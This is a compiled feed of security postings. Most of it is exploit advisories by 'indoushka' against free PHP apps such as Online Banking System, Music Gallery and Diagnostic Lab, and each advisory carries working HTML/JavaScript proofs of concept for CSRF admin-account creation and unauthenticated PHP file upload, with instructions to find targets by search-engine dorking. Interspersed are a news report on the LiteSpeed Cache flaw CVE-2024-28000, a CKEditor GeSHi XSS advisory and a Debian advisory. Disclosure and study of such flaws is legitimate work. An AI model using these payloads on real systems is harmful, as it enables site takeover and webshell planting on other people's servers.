Online Shopping System Master version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : online shopping system master v1.0 CSRF Vulnerability                                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/adduser.php.

[+] save code as poc.html .

<div class="card">  
                <div class="card-header card-header-primary">  
                  <h4 class="card-title">Add Users</h4>  
                  <p class="card-category">Complete User profile</p>  
                </div>  
                <div class="card-body">  
                  <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data">  
                    <div class="row">

                            </div>  
                      </div>  
                    </div>  
                    <div class="row">  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Email</label>  
                          <input type="email" name="email" id="email" class="form-control" required="">  
                        </div>  
                      </div>  
                      <div class="col-md-6">  
                        <div class="form-group bmd-form-group">  
                          <label class="bmd-label-floating">Password</label>  
                          <input type="password" id="password" name="password" class="form-control" required="">  
                        </div>  
                      </div>

                                        <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button>  
                    <div class="clearfix"></div>  
                  </form>  
                </div>  
              </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Shopping System Master 1.0 Cross Site Request Forgery

Online Banking System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload PHP malicious files directly.

    [+] Here’s a breakdown of its components and functionality:

    HTML Structure:  
        DOCTYPE & <html>: Defines the document type and language.  
        <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.  
        <body>: Contains the main content of the page.

    Form Elements:  
        <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.  
        <label> and <input> fields: Collect information from the user:  
            Target IP: IP address where the file will be uploaded.  
            Attacker IP: The IP address of the attacker (though this field is not used in the script).  
            Attacker Port: The port number of the attacker (not used in the script).  
            File Input: Allows the user to select a file to upload.  
        <button>: A button that triggers the file upload process when clicked.

    JavaScript Functionality:  
        uploadFile(): Function executed when the "Upload File" button is clicked.  
            Collects input values: Retrieves values from the input fields and the selected file.  
            Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.  
            FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').  
            fetch API: Sends a POST request to the target IP with the file attached:  
                URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings  
                Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.

    Security Note:  
        Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused.   
    It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.

[+] Line 45 set url of target.

[+] Choose the target IP .

[+] Put any IP address of your own .

[+] Put any port .

[+] The path to upload the files : http://localhost/banking/uploads/

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Direct File Upload</title>  
</head>  
<body>

    <h2>Direct File Upload</h2>  
    <form id="uploadForm">  
        <label for="targetIP">Target IP:</label>  
        <input type="text" id="targetIP" name="targetIP" required><br><br>

        <label for="attackerIP">Attacker IP:</label>  
        <input type="text" id="attackerIP" name="attackerIP" required><br><br>

        <label for="attackerPort">Attacker Port:</label>  
        <input type="number" id="attackerPort" name="attackerPort" required><br><br>

        <label for="fileInput">Select File:</label>  
        <input type="file" id="fileInput" name="fileInput" required><br><br>

        <button type="button" onclick="uploadFile()">Upload File</button>  
    </form>

    <script>  
        function uploadFile() {  
            const targetIP = document.getElementById('targetIP').value;  
            const attackerIP = document.getElementById('attackerIP').value;  
            const attackerPort = document.getElementById('attackerPort').value;  
            const fileInput = document.getElementById('fileInput').files[0];

            if (!targetIP || !attackerIP || !attackerPort || !fileInput) {  
                alert('Please fill in all fields and select a file.');  
                return;  
            }

            const formData = new FormData();  
            formData.append('name', 'PWNED');  
            formData.append('img', fileInput);

            console.log("(+) Uploading file...");

            fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {  
                method: 'POST',  
                body: formData  
            })  
            .then(response => response.text())  
            .then(data => {  
                if (data === '1') {  
                    console.log("(+) File upload seems to have been successful!");  
                } else {  
                    console.log("(-) Oh no, the file upload seems to have failed!");  
                }  
            })  
            .catch(error => console.error("(-) Error during file upload:", error));  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Arbitrary File Upload

Online ID Generator version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online ID Generator 1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online ID Generator 1.0 Cross Site Request Forgery

Cybersecurity researchers have disclosed a critical security flaw in the LiteSpeed Cache plugin for WordPress that could permit unauthenticated users to gain administrator privileges.
"The plugin suffers from an unauthenticated privilege escalation vulnerability which allows any unauthenticated visitor to gain Administrator level access after which malicious plugins could be uploaded and

Website Security / Vulnerability

Cybersecurity researchers have disclosed a critical security flaw in the LiteSpeed Cache plugin for WordPress that could permit unauthenticated users to gain administrator privileges.

"The plugin suffers from an unauthenticated privilege escalation vulnerability which allows any unauthenticated visitor to gain Administrator level access after which malicious plugins could be uploaded and installed," Patchstack's Rafie Muhammad said in a Wednesday report.

The vulnerability, tracked as CVE-2024-28000 (CVSS score: 9.8), has been patched in version 6.4 of the plugin released on August 13, 2024. It impacts all versions of the plugin, including and prior to 6.3.0.1.

LiteSpeed Cache is one of the most widely used caching plugins in WordPress with over five million active installations.

In a nutshell, CVE-2024-28000 makes it possible for an unauthenticated attacker to spoof their user ID and register as an administrative-level user, effectively granting them privileges to take over a vulnerable WordPress site.

The vulnerability is rooted in a user simulation feature in the plugin that uses a weak security hash that suffers from the use of a trivially guessable random number as the seed.

Specifically, there are only one million possible values for the security hash due to the fact that the random number generator is derived from the microsecond portion of the current time. What's more, the random number generator is not cryptographically secure and the generated hash is neither salted nor tied to a particular request or a user.

"This is due to the plugin not properly restricting the role simulation functionality allowing a user to set their current ID to that of an administrator, if they have access to a valid hash which can be found in the debug logs or through brute force," Wordfence said in its own alert.

"This makes it possible for unauthenticated attackers to spoof their user ID to that of an administrator, and then create a new user account with the administrator role utilizing the /wp-json/wp/v2/users REST API endpoint."

It's important to note that the vulnerability cannot be exploited on Windows-based WordPress installations due to the hash generation function's reliance on a PHP method called sys\_getloadavg() that's not implemented on Windows.

"This vulnerability highlights the critical importance of ensuring the strength and unpredictability of values that are used as security hashes or nonces," Muhammad said.

With a previously disclosed flaw in LiteSpeed Cache (CVE-2023-40000, CVSS score: 8.3) exploited by malicious actors, it's imperative that users move quickly to update their instances to the latest version.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaw in WordPress LiteSpeed Cache Plugin Allows Hackers Admin Access

### Affected packages
The vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.

### Impact
A potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.

The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.

### Patches

The [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.

To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0) . Please be aware of and understand the potential security vulnerabilities associated with its use.

The fix is be available in version 4.25.0-lts.

### Acknowledgements

The CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.

### For more information

Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.

**Affected packages**

The vulnerability has been discovered in Code Snippet GeSHi plugin. All integrators that use GeSHi syntax highlighter on the backend side can be affected.

**Impact**

A potential vulnerability has been discovered in CKEditor 4 Code Snippet GeSHi plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the GeSHi syntax highlighter library hosted by the victim.

The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.

**Patches**

The GeSHi library is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.

To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the GeSHi library . Please be aware of and understand the potential security vulnerabilities associated with its use.

The fix is be available in version 4.25.0-lts.

**Acknowledgements**

The CKEditor 4 team would like to thank Jiasheng He from Qihoo 360 for recognizing and reporting this vulnerability.

**For more information**

Email us at security@cksource.com if you have any questions or comments about this advisory.

**References**

*   GHSA-7r32-vfj5-c2jv
*   https://nvd.nist.gov/vuln/detail/CVE-2024-43407
*   ckeditor/ckeditor4@71072c9
*   ckeditor/ckeditor4@951e7d7

GHSA-7r32-vfj5-c2jv: Code Snippet GeSHi plugin has reflected cross-site scripting (XSS) vulnerability

Debian Linux Security Advisory 5754-1 - Martin Kaesberger discovered a vulnerability which affects multiple images may result in the disclosure of arbitrary files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5754-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 21, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cinderCVE ID         : CVE-2024-32498Martin Kaesberger discovered a vulnerability which affects multipleOpenStack components (Nova, Glance and Cinder): Malformed QCOW2 diskimages may result in the disclosure of arbitrary files.For the stable distribution (bookworm), this problem has been fixed inversion 2:21.3.1-1~deb12u1.We recommend that you upgrade your cinder packages.For the detailed security status of cinder please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cinderFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbFyK0ACgkQEMKTtsN8TjbX4Q//UEnptocLmd2xjQFiWwKRjzs/63sPfG9jhSMZtEMrhUpXMbBOvAWgYu9b/Cpu6UQufNuJ5u9zPTyb8GQXP5Uy8EHTGSjpVtv2MivuUQ/Hb5JmvWBwJ6Yb2hx7wWB1eb2y9VBGCtHE481dQpgcZoRVxdSi/QsKvaKIOh9bpaEL7kVpRE5BbewKwO/YX1xQ1HgkjF/IOdegcXnLJW3co2930vHUyYRyOE2/HeYFeHbKZLKZQOcruLZy8tXqTrZZb6qP5BFWeQH0pTqyQGUJJ2Qe1LbB8DW9DNRPTsCYocr//gRi40bhgBRv7FQfcWh0AGj6Ka0ItiVB7pBrV6BTtC+uAEqHjzt+ATmb4HlEWnyydwjuMmsso7Qo+yuw2SEiOlqEqO7EkOxrXdTFeaU1mHqoli4JX5+jrIYth9m7LHwi+VoAfKIBIlH8GFs1bPompF1hzdL9Quntvjg2LAI269PbG4taKUi7bH0TTVnDswhkyag0CJPW8T4Rxr3mcLLl1zL4xX+mbFjnp/I2mqGNEcq6z1d/Xn+y9m24k1ZNwVzjeUvbcKdDGZTDEngCdnToAYO9seTXoZ3SUvbys3aLsPhPE69UfWDaOJ1ngbsW9JepALIebRbJ39feAdDYa+JUwdiG44byISprQFwTYWVGi1AlD3kvAT3gnFzm+TMrhxC2KxA==kX3T-----END PGP SIGNATURE-----

Debian Security Advisory 5754-1

Online Diagnostic Lab Management System version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : Online Diagnostic Lab Management System v1.0 Remote File Upload Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : diagnostic/manage_website.php.[+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Upload Website Image</title></head><body>    <form action="http://127.0.0.1/diagnostic/manage_website.php" method="POST" enctype="multipart/form-data">        <label for="website_image">Upload Website Image:</label>        <input type="file" id="website_image" name="website_image" required>        <button type="submit" name="btn_web">Submit</button>    </form></body></html>[+] http://127.0.0.1/diagnostic/assets/uploadImage/Logo/webadmin.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Diagnostic Lab Management System 1.0 Arbitrary File Upload

Online Banking System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 CSRF Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/banking/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Cross Site Request Forgery

Music Gallery Site version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Music Gallery Site v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-music/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name     "indoushka".

[+] Line 19 : Choose a password "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-music\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Music Gallery Site 1.0 Cross Site Request Forgery

Multi-Vendor Online Groceries Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability                                                      |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload add new admin user .

[+] save payload as poc.html 

[+] line 27 Set your target url

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#php